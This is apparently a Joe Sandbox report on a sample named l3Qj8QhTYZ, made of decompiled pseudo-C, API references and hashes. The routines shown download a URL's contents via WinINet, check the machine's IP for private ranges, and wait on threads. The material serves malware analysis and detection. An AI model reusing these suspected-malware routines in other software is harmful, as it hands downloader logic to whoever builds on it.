                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                                                                                                  • String ID: %x%X$0
                                                                                                                                                                                                                                                                  • API String ID: 716646876-225668902
                                                                                                                                                                                                                                                                  • Opcode ID: 7a61a55b5eea98f5de0928e7475679bbe4d963543bacc3d689d31b3a0f4c3ad5
                                                                                                                                                                                                                                                                  • Instruction ID: 56e4f97a71f57edc04f120d05ce9dd721e6d08997ed102387e837c06df15420b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a61a55b5eea98f5de0928e7475679bbe4d963543bacc3d689d31b3a0f4c3ad5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB212174900208EBEB209BE0DD4DFAE7778BB44701F504139F602BA5D0DBB899499B68
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 502 40bf80-40c01b memset InternetCrackUrlA InternetOpenA 503 40c021-40c054 InternetConnectA 502->503 504 40c197-40c1a0 502->504 505 40c18a-40c191 InternetCloseHandle 503->505 506 40c05a-40c08a HttpOpenRequestA 503->506 505->504 507 40c090-40c0a7 HttpSendRequestA 506->507 508 40c17d-40c184 InternetCloseHandle 506->508 509 40c170-40c177 InternetCloseHandle 507->509 510 40c0ad-40c0b1 507->510 508->505 509->508 511 40c166 510->511 512 40c0b7 510->512 511->509 513 40c0c1-40c0c8 512->513 514 40c159-40c164 513->514 515 40c0ce-40c0f0 InternetReadFile 513->515 514->509 516 40c0f2-40c0f9 515->516 517 40c0fb 515->517 516->517 518 40c0fd-40c154 call 408880 memcpy 516->518 517->514 518->513
                                                                                                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                                                                                                  			E0040BF80(char* _a4, char** _a8) {
                                                                                                                                                                                                                                                                  				char _v260;
                                                                                                                                                                                                                                                                  				char _v772;
                                                                                                                                                                                                                                                                  				long _v776;
                                                                                                                                                                                                                                                                  				void* _v780;
                                                                                                                                                                                                                                                                  				intOrPtr _v792;
                                                                                                                                                                                                                                                                  				char* _v796;
                                                                                                                                                                                                                                                                  				signed short _v816;
                                                                                                                                                                                                                                                                  				intOrPtr _v820;
                                                                                                                                                                                                                                                                  				char* _v824;
                                                                                                                                                                                                                                                                  				void _v836;
                                                                                                                                                                                                                                                                  				void* _v840;
                                                                                                                                                                                                                                                                  				void* _v844;
                                                                                                                                                                                                                                                                  				void* _v848;
                                                                                                                                                                                                                                                                  				char* _v852;
                                                                                                                                                                                                                                                                  				void _v1876;
                                                                                                                                                                                                                                                                  				long _v1880;
                                                                                                                                                                                                                                                                  				void* _t91;
                                                                                                                                                                                                                                                                  				void* _t92;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v776 = 0;
                                                                                                                                                                                                                                                                  				_v840 = 0;
                                                                                                                                                                                                                                                                  				memset( &_v836, 0, 0x38);
                                                                                                                                                                                                                                                                  				_t92 = _t91 + 0xc;
                                                                                                                                                                                                                                                                  				_v840 = 0x3c;
                                                                                                                                                                                                                                                                  				_v824 =  &_v260;
                                                                                                                                                                                                                                                                  				_v820 = 0x100;
                                                                                                                                                                                                                                                                  				_v796 =  &_v772;
                                                                                                                                                                                                                                                                  				_v792 = 0x200;
                                                                                                                                                                                                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                                                                                                                                                                                                  				_v780 = InternetOpenA(0, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v780 != 0) {
                                                                                                                                                                                                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v844 != 0) {
                                                                                                                                                                                                                                                                  						_v848 = HttpOpenRequestA(_v844, "GET",  &_v772, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  						if(_v848 != 0) {
                                                                                                                                                                                                                                                                  							if(HttpSendRequestA(_v848, 0, 0, 0, 0) != 0) {
                                                                                                                                                                                                                                                                  								if(_a8 == 0) {
                                                                                                                                                                                                                                                                  									_v776 = 1;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_v852 = 0;
                                                                                                                                                                                                                                                                  									while(1 != 0) {
                                                                                                                                                                                                                                                                  										_t87 = _v848;
                                                                                                                                                                                                                                                                  										if(InternetReadFile(_v848,  &_v1876, 0x400,  &_v1880) != 0 && _v1880 != 0) {
                                                                                                                                                                                                                                                                  											_v776 = E00408880(_v776, _t87, _v776,  &(_v852[_v1880]));
                                                                                                                                                                                                                                                                  											memcpy( &(_v852[_v776]),  &_v1876, _v1880);
                                                                                                                                                                                                                                                                  											_t92 = _t92 + 0x14;
                                                                                                                                                                                                                                                                  											_v852 =  &(_v852[_v1880]);
                                                                                                                                                                                                                                                                  											continue;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										break;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									 *_a8 = _v852;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							InternetCloseHandle(_v848);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						InternetCloseHandle(_v844);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v780);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v776;
                                                                                                                                                                                                                                                                  			}





















                                                                                                                                                                                                                                                                  0x0040bf89
                                                                                                                                                                                                                                                                  0x0040bf93
                                                                                                                                                                                                                                                                  0x0040bfa8
                                                                                                                                                                                                                                                                  0x0040bfad
                                                                                                                                                                                                                                                                  0x0040bfb0
                                                                                                                                                                                                                                                                  0x0040bfc0
                                                                                                                                                                                                                                                                  0x0040bfc6
                                                                                                                                                                                                                                                                  0x0040bfd6
                                                                                                                                                                                                                                                                  0x0040bfdc
                                                                                                                                                                                                                                                                  0x0040bff8
                                                                                                                                                                                                                                                                  0x0040c00e
                                                                                                                                                                                                                                                                  0x0040c01b
                                                                                                                                                                                                                                                                  0x0040c047
                                                                                                                                                                                                                                                                  0x0040c054
                                                                                                                                                                                                                                                                  0x0040c07d
                                                                                                                                                                                                                                                                  0x0040c08a
                                                                                                                                                                                                                                                                  0x0040c0a7
                                                                                                                                                                                                                                                                  0x0040c0b1
                                                                                                                                                                                                                                                                  0x0040c166
                                                                                                                                                                                                                                                                  0x0040c0b7
                                                                                                                                                                                                                                                                  0x0040c0b7
                                                                                                                                                                                                                                                                  0x0040c0c1
                                                                                                                                                                                                                                                                  0x0040c0e1
                                                                                                                                                                                                                                                                  0x0040c0f0
                                                                                                                                                                                                                                                                  0x0040c119
                                                                                                                                                                                                                                                                  0x0040c13a
                                                                                                                                                                                                                                                                  0x0040c13f
                                                                                                                                                                                                                                                                  0x0040c14e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c14e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c0f0
                                                                                                                                                                                                                                                                  0x0040c162
                                                                                                                                                                                                                                                                  0x0040c162
                                                                                                                                                                                                                                                                  0x0040c0b1
                                                                                                                                                                                                                                                                  0x0040c177
                                                                                                                                                                                                                                                                  0x0040c177
                                                                                                                                                                                                                                                                  0x0040c184
                                                                                                                                                                                                                                                                  0x0040c184
                                                                                                                                                                                                                                                                  0x0040c191
                                                                                                                                                                                                                                                                  0x0040c191
                                                                                                                                                                                                                                                                  0x0040c1a0

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.NTDLL ref: 0040BFA8
                                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(0040CD99,00000000,10000000,0000003C), ref: 0040BFF8
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C008
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C041
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C077
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C09F
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C0E8
                                                                                                                                                                                                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040C13A
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C177
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C184
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C191
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                                                                                                  • String ID: <$GET
                                                                                                                                                                                                                                                                  • API String ID: 1205665004-427699995
                                                                                                                                                                                                                                                                  • Opcode ID: e434d94a767447e33f86dc89c6ee3707e4ccc101af4a559bb0826e734c245523
                                                                                                                                                                                                                                                                  • Instruction ID: e4e2bc4ae20f5a24e0f583b0843f83e65f824e6296bed8a186bd164e60841b18
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e434d94a767447e33f86dc89c6ee3707e4ccc101af4a559bb0826e734c245523
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7514C75901228DBDB36CB50CD94BD973B8AB08705F1041E9A60DBA2C1D7B96FC8CF54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00409750(signed int _a4, intOrPtr _a8, signed char _a12) {
                                                                                                                                                                                                                                                                  				signed char _v5;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				signed char _v13;
                                                                                                                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                                                                                                                  				signed char _t50;
                                                                                                                                                                                                                                                                  				char* _t52;
                                                                                                                                                                                                                                                                  				char* _t54;
                                                                                                                                                                                                                                                                  				signed int _t57;
                                                                                                                                                                                                                                                                  				void* _t65;
                                                                                                                                                                                                                                                                  				char* _t68;
                                                                                                                                                                                                                                                                  				char* _t72;
                                                                                                                                                                                                                                                                  				void* _t97;
                                                                                                                                                                                                                                                                  				void* _t98;
                                                                                                                                                                                                                                                                  				void* _t100;
                                                                                                                                                                                                                                                                  				void* _t102;
                                                                                                                                                                                                                                                                  				void* _t106;
                                                                                                                                                                                                                                                                  				void* _t109;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t50 = E00409490(_a4);
                                                                                                                                                                                                                                                                  				_t98 = _t97 + 4;
                                                                                                                                                                                                                                                                  				_t74 = _t50 & 0x000000ff;
                                                                                                                                                                                                                                                                  				if((_t50 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  					_t52 = strstr(E00409200(_t74, _a4), "127.");
                                                                                                                                                                                                                                                                  					_t100 = _t98 + 0xc;
                                                                                                                                                                                                                                                                  					if(_t52 == 0) {
                                                                                                                                                                                                                                                                  						L6:
                                                                                                                                                                                                                                                                  						_t54 = strstr(E00409200(_t74, _a4), "10.");
                                                                                                                                                                                                                                                                  						_t102 = _t100 + 0xc;
                                                                                                                                                                                                                                                                  						if(_t54 == 0) {
                                                                                                                                                                                                                                                                  							L10:
                                                                                                                                                                                                                                                                  							EnterCriticalSection(0x4139ac);
                                                                                                                                                                                                                                                                  							_v5 = 0;
                                                                                                                                                                                                                                                                  							_v12 = 0;
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								_t55 = _v12;
                                                                                                                                                                                                                                                                  								if(_v12 >=  *0x4139e4) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)( *((intOrPtr*)(0x4139e8 + _v12 * 4)) + 4)) != _a4) {
                                                                                                                                                                                                                                                                  									_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t65 = E0040BB80();
                                                                                                                                                                                                                                                                  								_t55 = _t65 - _a8;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)(0x4139e8 + _v12 * 4)) + 8)) = _t65 - _a8;
                                                                                                                                                                                                                                                                  								_v5 = 1;
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							E004096A0(_t55);
                                                                                                                                                                                                                                                                  							_t57 = _v5 & 0x000000ff;
                                                                                                                                                                                                                                                                  							if(_t57 != 0) {
                                                                                                                                                                                                                                                                  								L27:
                                                                                                                                                                                                                                                                  								LeaveCriticalSection(0x4139ac);
                                                                                                                                                                                                                                                                  								return _t57;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_v13 = 0;
                                                                                                                                                                                                                                                                  							if( *0x4139e4 == 0x200) {
                                                                                                                                                                                                                                                                  								_v13 = 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t57 = E00408820(0xc);
                                                                                                                                                                                                                                                                  							_v20 = _t57;
                                                                                                                                                                                                                                                                  							if(_v20 == 0) {
                                                                                                                                                                                                                                                                  								goto L27;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v20 + 4)) = _a4;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v20 + 8)) = E0040BB80() - _a8;
                                                                                                                                                                                                                                                                  								if((_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  									_t60 = _v20;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(0x4139e8 +  *0x4139e4 * 4)) = _v20;
                                                                                                                                                                                                                                                                  									 *0x4139e4 =  *0x4139e4 + 1;
                                                                                                                                                                                                                                                                  									L25:
                                                                                                                                                                                                                                                                  									_t57 = E004096A0(_t60);
                                                                                                                                                                                                                                                                  									if((_a12 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  										_t57 = E00409380(_t57);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									goto L27;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								while( *(0x4139e4[ *0x4139e4]) != 0) {
                                                                                                                                                                                                                                                                  									Sleep(1);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								 *(0x4139e4[ *0x4139e4]) = 1;
                                                                                                                                                                                                                                                                  								E00408990(0x4139e4[ *0x4139e4]);
                                                                                                                                                                                                                                                                  								_t60 =  *0x4139e4;
                                                                                                                                                                                                                                                                  								0x4139e4[ *0x4139e4] = _v20;
                                                                                                                                                                                                                                                                  								goto L25;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t68 = strstr(E00409200(_t74, _a4), ".10");
                                                                                                                                                                                                                                                                  						_t106 = _t102 + 0xc;
                                                                                                                                                                                                                                                                  						if(_t68 == 0) {
                                                                                                                                                                                                                                                                  							L9:
                                                                                                                                                                                                                                                                  							return _t68;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t68 = strstr(E00409200(_a4, _a4), ".10.");
                                                                                                                                                                                                                                                                  						_t102 = _t106 + 0xc;
                                                                                                                                                                                                                                                                  						if(_t68 != 0) {
                                                                                                                                                                                                                                                                  							goto L10;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L9;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t72 = strstr(E00409200(_t74, _a4), ".127");
                                                                                                                                                                                                                                                                  					_t109 = _t100 + 0xc;
                                                                                                                                                                                                                                                                  					if(_t72 == 0) {
                                                                                                                                                                                                                                                                  						L5:
                                                                                                                                                                                                                                                                  						return _t72;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t74 = _a4;
                                                                                                                                                                                                                                                                  					_t72 = strstr(E00409200(_a4, _a4), ".127.");
                                                                                                                                                                                                                                                                  					_t100 = _t109 + 0xc;
                                                                                                                                                                                                                                                                  					if(_t72 != 0) {
                                                                                                                                                                                                                                                                  						goto L6;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					goto L5;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t50;
                                                                                                                                                                                                                                                                  			}




















                                                                                                                                                                                                                                                                  0x0040975a
                                                                                                                                                                                                                                                                  0x0040975f
                                                                                                                                                                                                                                                                  0x00409762
                                                                                                                                                                                                                                                                  0x00409767
                                                                                                                                                                                                                                                                  0x00409780
                                                                                                                                                                                                                                                                  0x00409785
                                                                                                                                                                                                                                                                  0x0040978a
                                                                                                                                                                                                                                                                  0x004097cd
                                                                                                                                                                                                                                                                  0x004097df
                                                                                                                                                                                                                                                                  0x004097e4
                                                                                                                                                                                                                                                                  0x004097e9
                                                                                                                                                                                                                                                                  0x0040982c
                                                                                                                                                                                                                                                                  0x00409831
                                                                                                                                                                                                                                                                  0x00409837
                                                                                                                                                                                                                                                                  0x0040983b
                                                                                                                                                                                                                                                                  0x0040984d
                                                                                                                                                                                                                                                                  0x0040984d
                                                                                                                                                                                                                                                                  0x00409856
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409868
                                                                                                                                                                                                                                                                  0x0040984a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040984a
                                                                                                                                                                                                                                                                  0x0040986a
                                                                                                                                                                                                                                                                  0x0040986f
                                                                                                                                                                                                                                                                  0x0040987c
                                                                                                                                                                                                                                                                  0x0040987f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040987f
                                                                                                                                                                                                                                                                  0x00409887
                                                                                                                                                                                                                                                                  0x0040988c
                                                                                                                                                                                                                                                                  0x00409892
                                                                                                                                                                                                                                                                  0x00409968
                                                                                                                                                                                                                                                                  0x0040996d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040996d
                                                                                                                                                                                                                                                                  0x00409898
                                                                                                                                                                                                                                                                  0x004098a6
                                                                                                                                                                                                                                                                  0x004098a8
                                                                                                                                                                                                                                                                  0x004098a8
                                                                                                                                                                                                                                                                  0x004098ae
                                                                                                                                                                                                                                                                  0x004098b6
                                                                                                                                                                                                                                                                  0x004098bd
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004098c3
                                                                                                                                                                                                                                                                  0x004098c9
                                                                                                                                                                                                                                                                  0x004098d7
                                                                                                                                                                                                                                                                  0x004098e0
                                                                                                                                                                                                                                                                  0x0040993d
                                                                                                                                                                                                                                                                  0x00409940
                                                                                                                                                                                                                                                                  0x00409950
                                                                                                                                                                                                                                                                  0x00409956
                                                                                                                                                                                                                                                                  0x00409956
                                                                                                                                                                                                                                                                  0x00409961
                                                                                                                                                                                                                                                                  0x00409963
                                                                                                                                                                                                                                                                  0x00409963
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409961
                                                                                                                                                                                                                                                                  0x004098e2
                                                                                                                                                                                                                                                                  0x004098f5
                                                                                                                                                                                                                                                                  0x004098f5
                                                                                                                                                                                                                                                                  0x0040990a
                                                                                                                                                                                                                                                                  0x0040991e
                                                                                                                                                                                                                                                                  0x00409926
                                                                                                                                                                                                                                                                  0x0040992e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040992e
                                                                                                                                                                                                                                                                  0x004098bd
                                                                                                                                                                                                                                                                  0x004097fd
                                                                                                                                                                                                                                                                  0x00409802
                                                                                                                                                                                                                                                                  0x00409807
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040981b
                                                                                                                                                                                                                                                                  0x00409820
                                                                                                                                                                                                                                                                  0x00409825
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409825
                                                                                                                                                                                                                                                                  0x0040979e
                                                                                                                                                                                                                                                                  0x004097a3
                                                                                                                                                                                                                                                                  0x004097a8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004097af
                                                                                                                                                                                                                                                                  0x004097bc
                                                                                                                                                                                                                                                                  0x004097c1
                                                                                                                                                                                                                                                                  0x004097c6
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004097c6
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00409490: gethostname.WS2_32(?,00000100), ref: 004094AC
                                                                                                                                                                                                                                                                    • Part of subcall function 00409490: gethostbyname.WS2_32(?), ref: 004094BE
                                                                                                                                                                                                                                                                  • strstr.NTDLL ref: 00409780
                                                                                                                                                                                                                                                                  • strstr.NTDLL ref: 0040979E
                                                                                                                                                                                                                                                                  • strstr.NTDLL ref: 004097BC
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strstr$gethostbynamegethostname
                                                                                                                                                                                                                                                                  • String ID: .10$.10.$.127$.127.$10.$127.
                                                                                                                                                                                                                                                                  • API String ID: 2540993189-3303897403
                                                                                                                                                                                                                                                                  • Opcode ID: 8f7452eed3e96897848a9a3fd55ea4c3c03ecd81d5e18edef44a32495c4258d7
                                                                                                                                                                                                                                                                  • Instruction ID: 0e6ba8cad48665767f72902f7a1038e3695d8b3c4a802ec0be8d7a0393df22e0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f7452eed3e96897848a9a3fd55ea4c3c03ecd81d5e18edef44a32495c4258d7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0651C4F5A10204ABDB00EF61E842BAB7B65AB44305F14843FE944773C3D67ADA44CA9A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                                                                                                                  			E0040B9B0(LONG* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                  				int _v8;
                                                                                                                                                                                                                                                                  				long _v12;
                                                                                                                                                                                                                                                                  				LONG* _v16;
                                                                                                                                                                                                                                                                  				signed char _v17;
                                                                                                                                                                                                                                                                  				long _v24;
                                                                                                                                                                                                                                                                  				signed int _v28;
                                                                                                                                                                                                                                                                  				signed int _t57;
                                                                                                                                                                                                                                                                  				intOrPtr _t80;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = GetThreadPriority(GetCurrentThread());
                                                                                                                                                                                                                                                                  				SetThreadPriority(GetCurrentThread(), 0xfffffffe);
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                                                                                                                                  					_v16 = _a4;
                                                                                                                                                                                                                                                                  					if(InterlockedExchangeAdd(_v16, 0) > 0) {
                                                                                                                                                                                                                                                                  						_v17 = 0 | _a8 != 0xffffffff;
                                                                                                                                                                                                                                                                  						while(1 != 0) {
                                                                                                                                                                                                                                                                  							_v24 = 0;
                                                                                                                                                                                                                                                                  							EnterCriticalSection( &(_v16[1]));
                                                                                                                                                                                                                                                                  							_v28 = 0;
                                                                                                                                                                                                                                                                  							while(_v28 <  *_v16) {
                                                                                                                                                                                                                                                                  								if( *(_v16[7] + _v28 * 4) != 0) {
                                                                                                                                                                                                                                                                  									_t57 = WaitForSingleObject( *(_v16[7] + _v28 * 4), 0);
                                                                                                                                                                                                                                                                  									asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  									_v24 =  ~_t57 + 1 + _v24;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_v28 = _v28 + 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							LeaveCriticalSection( &(_v16[1]));
                                                                                                                                                                                                                                                                  							if(_v24 !=  *_v16) {
                                                                                                                                                                                                                                                                  								if((_v17 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  									L15:
                                                                                                                                                                                                                                                                  									Sleep(1);
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_t80 = _a8 - 1;
                                                                                                                                                                                                                                                                  									_a8 = _t80;
                                                                                                                                                                                                                                                                  									if(_t80 != 0) {
                                                                                                                                                                                                                                                                  										goto L15;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_v12 = 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L16;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L16:
                                                                                                                                                                                                                                                                  				SetThreadPriority(GetCurrentThread(), _v8);
                                                                                                                                                                                                                                                                  				return _v12;
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x0040b9c3
                                                                                                                                                                                                                                                                  0x0040b9cf
                                                                                                                                                                                                                                                                  0x0040b9d5
                                                                                                                                                                                                                                                                  0x0040b9e0
                                                                                                                                                                                                                                                                  0x0040b9e9
                                                                                                                                                                                                                                                                  0x0040b9fa
                                                                                                                                                                                                                                                                  0x0040ba09
                                                                                                                                                                                                                                                                  0x0040ba0c
                                                                                                                                                                                                                                                                  0x0040ba19
                                                                                                                                                                                                                                                                  0x0040ba27
                                                                                                                                                                                                                                                                  0x0040ba2d
                                                                                                                                                                                                                                                                  0x0040ba3f
                                                                                                                                                                                                                                                                  0x0040ba56
                                                                                                                                                                                                                                                                  0x0040ba72
                                                                                                                                                                                                                                                                  0x0040ba7a
